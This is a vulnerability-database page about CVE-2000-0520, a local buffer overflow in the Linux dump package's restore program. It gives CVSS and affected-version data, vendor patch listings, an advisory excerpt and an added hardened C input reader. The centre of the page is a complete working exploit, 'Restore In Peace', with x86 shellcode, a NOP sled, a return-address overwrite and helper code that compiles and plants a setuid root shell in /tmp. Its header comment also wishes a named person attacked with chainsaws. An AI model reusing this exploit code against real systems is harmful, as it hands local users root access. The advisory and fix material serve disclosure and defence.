CVE-2000-0520
CVSS7.2
Published: 2000-06-07 00:00:00
Revised: 2016-10-17 22:07:15

[Original] Buffer overflow in restore program 0.4b17 and earlier in dump package allows local users to execute arbitrary commands via a long tape name.


[CNNVD] Multiple Linux Vendor restore Buffer Overflow Vulnerability (CNNVD-200006-031)

The restore program in the dump package, version 0.4b17 and earlier, contains a buffer overflow. A local user can execute arbitrary commands by supplying an overly long tape name.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [complete information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:stelian:pop_dump:0.4b15.30
cpe:/a:stelian:pop_dump:0.4b9.9
cpe:/a:stelian:pop_dump:0.4b15.1
cpe:/a:stelian:pop_dump:0.4b16.0
cpe:/a:stelian:pop_dump:0.4b17.0
cpe:/a:stelian:pop_dump:0.4b9.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0520
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0520
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200006-031
(Official data source) CNNVD

- Other links and resources

http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=11880
(VENDOR_ADVISORY)  MISC  http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=11880
http://marc.info/?l=bugtraq&m=96240393814071&w=2
(UNKNOWN)  BUGTRAQ  20000630 CONECTIVA LINUX SECURITY ANNOUNCEMENT - dump
http://www.securityfocus.com/bid/1330
(VENDOR_ADVISORY)  BID  1330

- Vulnerability information

Multiple Linux Vendor restore Buffer Overflow Vulnerability
High risk  Buffer overflow
2000-06-07 00:00:00 2005-10-20 00:00:00
Local
The restore program in the dump package, version 0.4b17 and earlier, contains a buffer overflow. A local user can execute arbitrary commands by supplying an overly long tape name.

- Advisories and patches

The package has been patched by its maintainer, and a new version released.

Linux-Mandrake 6.0:
828d750c80c021c6253cac0191486fb1 6.0/RPMS/dump-0.4b18-1mdk.i586.rpm
3e6355619c5ee93ac3505efdb35831fe 6.0/RPMS/rmt-0.4b18-1mdk.i586.rpm
4ff0d0a768b603f22a40745da303e365 6.0/SRPMS/dump-0.4b18-1mdk.src.rpm

Linux-Mandrake 6.1:
5a6587e3320eefb639ff4dad95e291be 6.1/RPMS/dump-0.4b18-1mdk.i586.rpm
582e35490586bcf04f1d35dcb04b6b23 6.1/RPMS/rmt-0.4b18-1mdk.i586.rpm
4ff0d0a768b603f22a40745da303e365 6.1/SRPMS/dump-0.4b18-1mdk.src.rpm

Linux-Mandrake 7.0:
6f9918a61ced3dd8d20cf2b9b34508d8 7.0/RPMS/dump-0.4b18-1mdk.i586.rpm
59c52401e9eb452fe9876d99cf2448bf 7.0/RPMS/rmt-0.4b18-1mdk.i586.rpm
4ff0d0a768b603f22a40745da303e365 7.0/SRPMS/dump-0.4b18-1mdk.src.rpm

Linux-Mandrake 7.1:
1c14f72e09d69fcd4645ea2bd80c4ab3 7.1/RPMS/dump-0.4b18-1mdk.i586.rpm
6d419e7e52dda174f7250b1b59c6b614 7.1/RPMS/rmt-0.4b18-1mdk.i586.rpm
4ff0d0a768b603f22a40745da303e365 7.1/SRPMS/dump-0.4b18-1mdk.src.rpm

To upgrade automatically, use < MandrakeUpdate >

If you want to upgrade manually, download the updated package from one
of our FTP server mirrors and upgrade with "rpm -Uvh package_name".

You can download the updates directly from:
ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates

Stelian Pop dump 0.4 b15-30
Stelian Pop dump 0.4 b16-0
Stelian Pop dump 0.4 b9-9
Stelian Pop dump 0.4 b17-0
Stelian Pop dump 0.4 b9-0
Stelian Pop dump 0.4 b15-1

- Vulnerability information (20004)

Stelian Pop dump 0.4 restore Buffer Overflow Vulnerability (EDBID:20004)
linux local
2000-06-07 Verified
0 Stan Bubrouski
N/A
source: http://www.securityfocus.com/bid/1330/info


A buffer overflow exists in the 'restore' program, part of the dump 0.4b15-1 package, distributed with RedHat Linux 6.2. By supplying a long string containing machine executable code at the prompt for a tape name, it is possible for an attacker to execute arbitrary code with root privileges.

The buffer overflow lies in the tape.c source file:
/dump-0.4b15/compat/include/protocols/dumprestore.h: line 53: #define TP_BSIZE 1024
/dump-0.4b15/restore/tape.c: line 311: char buf[TP_BSIZE];
/dump-0.4b15/restore/tape.c: line 357: (void) fgets(buf, BUFSIZ, terminal)
/dump-0.4b15/restore/tape.c: line 382: (void) fgets(buf, BUFSIZ, terminal);

As BUFSIZ is defined to be 8192, the fgets() will attempt to copy up to 8192 bytes into a 1024 byte buffer.
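The defect in the quoted lines is a bound mismatch: fgets() is given BUFSIZ, the stdio constant (8192 on glibc), instead of the size of buf (TP_BSIZE, 1024), so any answer to the tape-name prompt longer than 1023 bytes is written past the end of a stack buffer. The fix is to bind the read to the buffer's own size and to reject an over-long line outright instead of silently truncating it, draining the remainder so the next prompt does not consume its tail. The following C program is an added example written for this page; it is not code from the dump project or from the advisory. TP_BSIZE is the constant the advisory quotes; read_tape_name, demo_short_name and demo_overlong_name are hypothetical names, and the inputs are constructed in-memory lines fed through fmemopen(3).

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* for fmemopen(3) */
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same constant the advisory quotes from dumprestore.h. */
#define TP_BSIZE 1024

/*
 * Vulnerable pattern quoted in the advisory (shown here only as a comment):
 *     char buf[TP_BSIZE];
 *     (void) fgets(buf, BUFSIZ, terminal);   // BUFSIZ (8192) > sizeof buf (1024)
 *
 * Hardened reader (hypothetical name): the bound is the caller's real buffer
 * size, an over-long line is rejected rather than truncated, and the rest of
 * that line is drained so the following prompt starts on a fresh line.
 *
 * Returns the name length on success, -1 on EOF/error, -2 if the line did
 * not fit in bufsz-1 bytes (buf is then set to the empty string).
 */
int read_tape_name(char *buf, size_t bufsz, FILE *in)
{
    if (buf == NULL || bufsz < 2 || in == NULL)
        return -1;
    if (fgets(buf, (int)bufsz, in) == NULL)
        return -1;

    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';
        return (int)len;
    }

    /* No newline in buf: either the final line lacks one, the line is exactly
       bufsz-1 bytes (newline still pending), or it overflowed the buffer. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return (int)len;

    while (c != '\n' && c != EOF)   /* drain the remainder of the long line */
        c = fgetc(in);
    buf[0] = '\0';
    return -2;
}

/* Demo 1: an ordinary tape name is read intact. Returns 1 on success. */
int demo_short_name(void)
{
    char buf[TP_BSIZE];
    const char *input = "/dev/nst0\n";           /* constructed input */
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    if (f == NULL)
        return 0;
    int r = read_tape_name(buf, sizeof buf, f);
    fclose(f);
    return r == 9 && strcmp(buf, "/dev/nst0") == 0;
}

/* Demo 2: the failure mode from the advisory. A 2000-byte name (constructed,
   larger than TP_BSIZE) is rejected with -2, and the line after it is still
   read correctly because the over-long line was drained. Returns 1 on success. */
int demo_overlong_name(void)
{
    char buf[TP_BSIZE];
    const size_t n = 2000;
    const char *tail = "second\n";
    char *input = malloc(n + strlen(tail) + 2);   /* 'A' * n, '\n', tail, NUL */
    if (input == NULL)
        return 0;
    memset(input, 'A', n);
    input[n] = '\n';
    strcpy(input + n + 1, tail);

    FILE *f = fmemopen(input, strlen(input), "r");
    if (f == NULL) {
        free(input);
        return 0;
    }
    int r1 = read_tape_name(buf, sizeof buf, f);   /* over-long line: -2 */
    int r2 = read_tape_name(buf, sizeof buf, f);   /* next line: 6, "second" */
    fclose(f);
    free(input);
    return r1 == -2 && r2 == 6 && strcmp(buf, "second") == 0;
}

int main(void)
{
    printf("short name read intact:  %d\n", demo_short_name());
    printf("over-long name rejected: %d\n", demo_overlong_name());
    return 0;
}
```

Passing `sizeof buf` only works where buf is the array itself; once the buffer is handed to another function as a pointer, the size must travel with it as a separate parameter, which is why the reader above takes bufsz explicitly. Rejecting rather than truncating matters for interactive prompts: a truncated name would be silently acted on, while the drained remainder of a long line would otherwise be fed to the next question.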

/* 
   DO NOT DISTRIBUTE     -     DO NOT DISTRIBUTE     -     DO NOT DISTRIBUTE 

   Restore In Peace ?

   Guess not, silly mistakes keep being made in the dump package time
   and time again... Someone should give it an audit once

    For once, NOT a L4m3rz stylish shellscript, but a pure C program that
    does the same trick.
    It's so messy that I have changed my mind about not writing shellscript
    exploits and will go and write a L4m3rz stylish script next time :)

    Use as: rip <type> [offset]
    Where type is: 1) dump 0.3-14 on regular Linux boxes
                   2) dump 0.3-14 on Linux boxes with 2.2.X && X<16 kernel
                   3) dump-0.4b13 on regular Linux boxes
                   4) dump-0.4b13 on Linux boxes with the buggy kernel

    A Linux box with a buggy kernel will yield root. In other cases we get
    a setgid root.

    Type (1) might function a bit buggy with bash 2 since we cannot setgid
    to 0 when we're egid 0 - set SHAT to ash or zsh instead :(
    I realized that type 2 also doesn't work perfectly with bash2 - use a
    real shell for this exploit.

    Good Riddance!
       -- Scrippie
       -- ronald@grafix.nl - #phreak.nl - buffer0verfl0w security

    Love goes out to: Hester, Maja, Renata

    I hope the following person will ambushed by villains with chainsaws:
       Gerrie Mansur

    Shouts to: all my friends @ircnet and @IRL

   DO NOT DISTRIBUTE     -     DO NOT DISTRIBUTE     -     DO NOT DISTRIBUTE 

*/

#include <stdio.h>
#include <linux/capability.h>
#include <linux/unistd.h>
#include <sys/types.h>

#define NOP	0x90		/* Here I am again, I'm coming back for more */
#define RETA314	2052		/* Index number of the return address */
#define RETA4b13 2068
#define NUMNOPS	700		/* 700 usefull nops on the stack */
#define SHELLAT	"/tmp/loki"	/* Hail to thee, god of evil! */

#define SHAT	"/bin/ash"	/* And to thee, *nix utilities! */
#define CHOWNAT	"/bin/chown"
#define CHMODAT "/bin/chmod"

#define GCCAT	"/usr/bin/gcc"	/* And to thee, GNU utilities! */

#define RESTAT	"/sbin/restore"	/* And to thee, buggy file! */

char hellcode[] =
   "\x66\x31\xc0\x66\x31\xdb\xb0\x17\xcd\x80" /* Bash 2 evasion */
   "\x66\x31\xc0\x66\x31\xdb\xb0\x2e\xcd\x80" /* Idem for gid */
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/tmp/lk";

_syscall2(int, capset, cap_user_header_t, header, const cap_user_data_t, data)
extern int capset(cap_user_header_t header, cap_user_data_t data);
void banner(void);
void makeLKregular(void);
void makeLKbuggyKernel(void);
void makeCFILE(void);

unsigned long get_sp(void) {
   __asm__("movl %esp, %eax");
}

main(int argc, char **argv)
{
   FILE *evilRestore, lk;
   char *overflow;
   unsigned long addy;
   int offset=0;
   int retapos;
   pid_t child;
   int type;

   if(argc<2) {
      banner();
      exit(-1);
   }

   if(argc == 3) offset = atoi(argv[2]);

   switch(atoi(argv[1])) {
      case 1:
         printf("Assuming Dump package version: dump-0.3-14\n");
         printf("Trying to grab SGID root shell...\n");
         type = 1;
         offset = 2500;
         retapos = RETA314;
         break;
      case 2:
         printf("Assuming Dump package version: dump-0.3-14\n");
         printf("Trying to grab SUID root shell...\n");
         type = 2;
         offset = 2500;
         retapos = RETA314;
         break;
      case 3:
         printf("Assuming Dump package version: dump-0.4b13\n");
         printf("Trying to grab SGID root shell...\n");
         type = 1;
         offset = 6000;
         retapos = RETA4b13;
         break;
      case 4:
         printf("Assuming Dump package version: dump-0.4b13\n");
         printf("Trying to grab SUID root shell...\n");
         type = 2;
         offset = 6000;
         retapos = RETA4b13;
         break;
      default:
         printf("Unknown type - exiting\n");
         exit(-1);
   }

   if(type == 2) {
        struct __user_cap_header_struct caph={_LINUX_CAPABILITY_VERSION, 0};
        struct __user_cap_data_struct capd={0, 0, 0xfffffe7f};
        capset(&caph, &capd);
        printf("Dropped the SETUID_CAP...\n");
   }

   addy = get_sp() - offset;

   overflow = (char *) malloc(retapos+5);

   memset(overflow, 0x90, retapos);

   memcpy((overflow+NUMNOPS), hellcode, strlen(hellcode));

   overflow[retapos] = addy & 0xff;
   overflow[retapos+1] = (addy >> 8 & 0xff);
   overflow[retapos+2] = (addy >> 16 & 0xff);
   overflow[retapos+3] = (addy >> 24 & 0xff);
   overflow[retapos+4] = 0x00;

   evilRestore = fopen("/tmp/t", "w");

   printf("Building C program wrapper...\n");
   makeCFILE();
   printf("Building ShellScript that will be called...\n");

   if(type == 1) makeLKregular();
   if(type == 2) makeLKbuggyKernel();

   printf("Building overflow file...\n");
   printf("Using address: %x\n", addy);

   fprintf(evilRestore, "n\nn\nn\nn\n1\n");
   fprintf(evilRestore, overflow);
   fprintf(evilRestore, "\n1\nnone\n");

   fflush(evilRestore);
   fclose(evilRestore);

   printf("Executing: %s\n", RESTAT);
   sleep(3);

   if((child = fork()) == 0) {
      char blaat[200];
      snprintf(blaat, 200, "%s -R < /tmp/t\n", RESTAT);
      system(blaat);
      unlink("/tmp/t");
      unlink("/tmp/lk");
   }

   printf("\nIf everything worked out you can now run: %s\n", SHELLAT);

}

void makeLKregular(void)
{
   FILE *lk;
   char blaat[1000];	/* Phjear the allmighty mem-sucker! */

   lk = fopen("/tmp/lk", "w");

   snprintf(blaat, 1000, "#!%s\n%s .root %s\n%s 6755 %s\n",
            SHAT, CHOWNAT, SHELLAT, CHMODAT, SHELLAT);

   fprintf(lk, blaat);
   fflush(lk);
   fclose(lk);
   umask(0);
   chmod("/tmp/lk", 0755);
}

void makeLKbuggyKernel(void)
{
   FILE *lk;
   char blaat[1000];    /* Phjear the allmighty mem-sucker! */

   lk = fopen("/tmp/lk", "w");

   snprintf(blaat, 1000, "#!%s\n%s root.root %s\n%s 6755 %s\n",
            SHAT, CHOWNAT, SHELLAT, CHMODAT, SHELLAT);

   fprintf(lk, blaat);
   fflush(lk);
   fclose(lk);
   umask(0);
   chmod("/tmp/lk", 0755);
}


void makeCFILE(void)
{
   FILE *loki;
   pid_t child;

   loki = fopen("/tmp/loki.c", "w");
   fprintf(loki, "#include <stdio.h>\n\n");
   fprintf(loki, "main()\n");
   fprintf(loki, "{\n   setuid(0);\n");
   fprintf(loki, "   setgid(0);\n");
   fprintf(loki, "   execl(\"");
   fprintf(loki, SHAT);
   fprintf(loki, "\", \"sh\", NULL);\n");
   fprintf(loki, "}");

   fflush(loki);
   fclose(loki);

   if((child = fork()) == 0) {
      execl(GCCAT, "gcc", "/tmp/loki.c", "-o", SHELLAT, NULL);
   }
   wait();
   unlink("/tmp/loki.c");
}

void banner(void)
{
   printf("Restore In Peace ? - Scrippie/#phreak.nl/b0f\n");
   printf("--------------------------------------------\n");
   printf("Use as: rip <type> [offset]\n");
   printf("Types - 1) dump-0.3-14 - Regular Linux\n");
   printf("      - 2) dump-0.3-14 - Linux with buggy kernel :)\n");
   printf("      - 3) dump-0.4b13 - Regular Linux\n");
   printf("      - 4) dump-0.4b13 - Linux with buggy kernel :)\n");
}
		

- Vulnerability information

13686
Linux restore Tape Name Variable Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- Vulnerability description

Unknown or Incomplete

- Timeline

2000-06-07 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Credit

Unknown or Incomplete

- Vulnerability information

Multiple Linux Vendor restore Buffer Overflow Vulnerability
Boundary Condition Error 1330
No Yes
2000-06-07 12:00:00 2009-07-11 02:56:00
This vulnerability was posted to the Bugzilla bug tracking database for dump by Stan Bubrouski <satan@fastdial.net> on June 2, 2000. This vulnerability was posted to the Bugtraq mailing list by Riley Hassell <comsec.admin@gte.net>

- Affected versions

Stelian Pop dump 0.4 b9-9
+ S.u.S.E. Linux 6.3 ppc
+ S.u.S.E. Linux 6.3 alpha
+ S.u.S.E. Linux 6.3
Stelian Pop dump 0.4 b9-0
+ Debian Linux 2.1
Stelian Pop dump 0.4 b17-0
- Linux kernel 2.3 .x
- Linux kernel 2.2 .x
- Linux kernel 2.1 .x
Stelian Pop dump 0.4 b16-0
+ Debian Linux 2.2 pre potato
+ Debian Linux 2.2
Stelian Pop dump 0.4 b15-30
+ S.u.S.E. Linux 6.4
Stelian Pop dump 0.4 b15-1
+ Mandriva Linux Mandrake 7.0
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
Stelian Pop dump 0.4 b18-0
- Linux kernel 2.3 .x
- Linux kernel 2.2 .x
- Linux kernel 2.1 .x

- Unaffected versions

Stelian Pop dump 0.4 b18-0
- Linux kernel 2.3 .x
- Linux kernel 2.2 .x
- Linux kernel 2.1 .x

- Vulnerability discussion


- Exploit

Exploit available:

- Solution


- References

 

 
